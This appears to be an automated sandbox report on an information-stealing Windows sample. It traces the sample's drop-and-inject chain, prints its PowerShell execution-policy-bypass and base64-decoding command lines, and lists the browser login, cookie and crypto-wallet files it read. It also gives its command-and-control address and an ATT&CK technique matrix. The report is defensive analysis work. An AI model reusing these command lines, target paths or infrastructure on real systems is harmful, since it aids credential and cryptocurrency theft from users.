                          Source: wscript.exe, 00000001.00000002.1640421406.000000000320D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y\W
                          Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: VBoxTray
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: vmtoolsd
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: VBoxService
                          Source: RegAsm.exe, 00000006.00000002.1879312113.000000000586D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | API call chain: ExitProcess graph end node (graph_0-3216)
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara match | File source: amsi32_7184.amsi.csv, type: OTHER
                          Source: Yara match | File source: C:\Users\user\QJHJap.ps1, type: DROPPED
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: Base64 decoded Q1|
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C4C008
                          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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 to behavior
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('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 to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_00403532
                          Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match | File source: dump.pcap, type: PCAP
                          Source: Yara match | File source: 5.2.powershell.exe.7190980.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 5.2.powershell.exe.7190980.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
                          Source: powershell.exe, 00000004.00000002.1652883073.0000000007830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                          Source: Yara match | File source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match | File source: dump.pcap, type: PCAP
                          Source: Yara match | File source: 5.2.powershell.exe.7190980.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 5.2.powershell.exe.7190980.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information112
                          Scripting
                          Valid Accounts221
                          Windows Management Instrumentation
                          112
                          Scripting
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          2
                          File and Directory Discovery
                          Remote Services1
                          Archive Collected Data
                          1
                          Encrypted Channel
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution
                          1
                          DLL Side-Loading
                          1
                          Access Token Manipulation
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory115
                          System Information Discovery
                          Remote Desktop Protocol3
                          Data from Local System
                          1
                          Non-Standard Port
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts11
                          Command and Scripting Interpreter
                          Logon Script (Windows)211
                          Process Injection
                          1
                          Obfuscated Files or Information
                          Security Account Manager221
                          Security Software Discovery
                          SMB/Windows Admin Shares1
                          Clipboard Data
                          1
                          Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts4
                          PowerShell
                          Login HookLogin Hook1
                          Install Root Certificate
                          NTDS1
                          Process Discovery
                          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Software Packing
                          LSA Secrets241
                          Virtualization/Sandbox Evasion
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading
                          Cached Domain Credentials1
                          Application Window Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Masquerading
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                          Virtualization/Sandbox Evasion
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Behavior Graph ID: 1431938 Sample: f6FauZ2CEz.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100
                          2 start node
                            38 Snort IDS alert for network traffic 2->38
                            40 Found malware configuration 2->40
                            42 Malicious sample detected (through community Yara rule) 2->42
                            44 10 other signatures 2->44
                            9 f6FauZ2CEz.exe 7 2->9 started
                              32 C:\Users\user\temp.bat, DOS 9->32 dropped
                              34 C:\Users\user\start.vbs, ASCII 9->34 dropped
                              12 wscript.exe 1 9->12 started
                                64 Wscript starts Powershell (via cmd or directly) 12->64
                                66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->66
                                68 Suspicious execution chain found 12->68
                                15 cmd.exe 2 12->15 started
                                  70 Suspicious powershell command line found 15->70
                                  72 Wscript starts Powershell (via cmd or directly) 15->72
                                  74 Very long command line found 15->74
                                  76 2 other signatures 15->76
                                  18 powershell.exe 15 15->18 started
                                    46 Writes to foreign memory regions 18->46
                                    48 Injects a PE file into a foreign processes 18->48
                                    26 RegAsm.exe 6 24 18->26 started
                                      36 5.42.92.179, 18418, 49730 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 26->36
                                      56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->56
                                      58 Installs new ROOT certificates 26->58
                                      60 Found many strings related to Crypto-Wallets (likely being stolen) 26->60
                                      62 3 other signatures 26->62
                                  21 powershell.exe 16 15->21 started
                                    30 C:\Users\user\QJHJap.ps1, Unicode 21->30 dropped
                                    50 Found many strings related to Crypto-Wallets (likely being stolen) 21->50
                                    52 Suspicious execution chain found 21->52
                                    54 Found suspicious powershell code related to unpacking or dynamic code loading 21->54
                                  24 conhost.exe 15->24 started

                          SourceDetectionScannerLabelLink
                          f6FauZ2CEz.exe10%VirustotalBrowse
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Note: the http://tempuri.org/... entries below are the default XML namespace that .NET (WCF and ASMX) assigns to service contracts. They are strings recovered from RegAsm.exe memory, not hosts the sample contacted; the only contacted endpoint in this analysis is 5.42.92.179:18418.

Source | Detection | Scanner | Label | Link
https://api.ip.sb/ip | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://tempuri.org/ | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id14ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id23ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id12Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id2Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id8 | 0% | Avira URL Cloud | safe |
http://tempuri.org/ | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id6ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21Response | 4% | Virustotal | | Browse
http://tempuri.org/Entity/Id5 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id8 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id23ResponseD | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id12Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id2Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id4 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id7 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id19Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id13ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6ResponseD | 1% | Virustotal | | Browse
5.42.92.179:18418 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id15Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id7 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id14ResponseD | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id4 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id19Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id13ResponseD | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id5ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id15Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id20 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id22 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id5 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id23 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id24 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1ResponseD | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id24Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id5ResponseD | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id22 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id1Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id20 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id24Response | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id23 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id10 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id11 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id10ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id24 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id21ResponseD | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id10 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id12 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id16Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id13 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id9Response | 2% | Virustotal | | Browse
http://tempuri.org/Entity/Id15 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id14 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id10ResponseD | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id16 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id12 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id13 | 1% | Virustotal | | Browse
http://tempuri.org/Entity/Id17 | 0% | Avira URL Cloud | safe |
